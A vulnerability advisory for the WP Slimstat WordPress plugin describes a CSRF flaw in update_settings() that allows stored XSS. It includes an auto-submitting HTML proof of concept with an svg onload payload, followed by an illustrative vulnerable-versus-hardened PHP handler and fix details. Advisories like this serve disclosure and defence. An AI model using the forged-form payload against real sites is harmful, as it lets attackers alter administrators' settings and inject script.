WP Slimstat <= 4.8.3 - CSRF to Stored XSS and Setting Updates

Description
The update_settings() function neither verifies a CSRF token (nonce) nor sanitises the submitted values. A logged-in administrator who visits an attacker-controlled page can therefore be made to submit a forged request that changes the plugin's settings, and because the values are stored unsanitised, the same request can plant a Stored XSS payload in the settings page.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin.php?page=slimconfig&tab=1" method="POST">
      <input type="hidden" name="options[posts_column_day_interval]" value='28"><svg/onload=alert(/XSS/)>' />
    </form>
  </body>
</html>
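The two missing controls named in the description are a nonce check on the request and type coercion of the submitted value before it is stored. The following WordPress handler is an added illustration of the vulnerable shape beside its hardened form; it is not Slimstat's code or its actual fix. The option name posts_column_day_interval and the admin page slug slimconfig are taken from the proof of concept above; the function names, the option key my_plugin_options and the nonce action my_plugin_update_settings are assumptions made for this example.

```php
<?php
// Added illustrative example (not Slimstat's code). Assumes a plugin whose
// settings form posts to admin.php?page=slimconfig and stores one integer
// option, posts_column_day_interval, inside the option my_plugin_options.

// Before: the shape the advisory describes. Any POST that reaches the page is
// trusted, and the raw array is stored without checking types or origin.
function vulnerable_update_settings() {
    if ( isset( $_POST['options'] ) ) {
        update_option( 'my_plugin_options', $_POST['options'] ); // no nonce, no sanitisation
    }
}

// After: confirm the request came from the plugin's own form, confirm the user
// may change settings, and coerce each option to its expected type.
function hardened_update_settings() {
    if ( ! isset( $_POST['options'] ) ) {
        return;
    }

    // Rejects forged cross-site requests: the nonce is bound to the logged-in
    // user and the action name, and a third-party page cannot read it.
    check_admin_referer( 'my_plugin_update_settings', 'my_plugin_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'my-plugin' ) );
    }

    $raw     = wp_unslash( (array) $_POST['options'] );
    $options = array();

    // Allow-list the keys and coerce each to its type. An interval is an
    // integer, so absint() leaves no room for markup such as "><svg ...>.
    if ( isset( $raw['posts_column_day_interval'] ) ) {
        $options['posts_column_day_interval'] = absint( $raw['posts_column_day_interval'] );
    }

    update_option( 'my_plugin_options', $options );
}

// Rendering: emit the nonce field the handler expects, and escape stored values
// on output so a value that somehow bypassed sanitisation still cannot break
// out of the attribute.
function render_settings_form() {
    $options  = get_option( 'my_plugin_options', array() );
    $interval = isset( $options['posts_column_day_interval'] )
        ? (int) $options['posts_column_day_interval']
        : 28;
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=slimconfig&tab=1' ) ); ?>">
        <?php wp_nonce_field( 'my_plugin_update_settings', 'my_plugin_nonce' ); ?>
        <input type="number" name="options[posts_column_day_interval]"
               value="<?php echo esc_attr( $interval ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}
```

Against the proof of concept above, the hardened handler fails at check_admin_referer(): the auto-submitting form carries no nonce, so WordPress stops the request before any option is touched. Even if a nonce were somehow present, absint() would reduce the payload to 28, and esc_attr() on output is the last line of defence for values that already sit in the database from before the fix.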

Affects Plugin

Fixed in version 4.8.4

References

URL https://plugins.trac.wordpress.org/changeset/2119485

Classification

Type MULTI

Miscellaneous

Views 2441
Verified Yes
WPVDB ID 9431

Timeline

Publicly Published 2019-07-08 (4 months ago)
Added 2019-07-08 (4 months ago)
Last Updated 2019-07-15 (4 months ago)
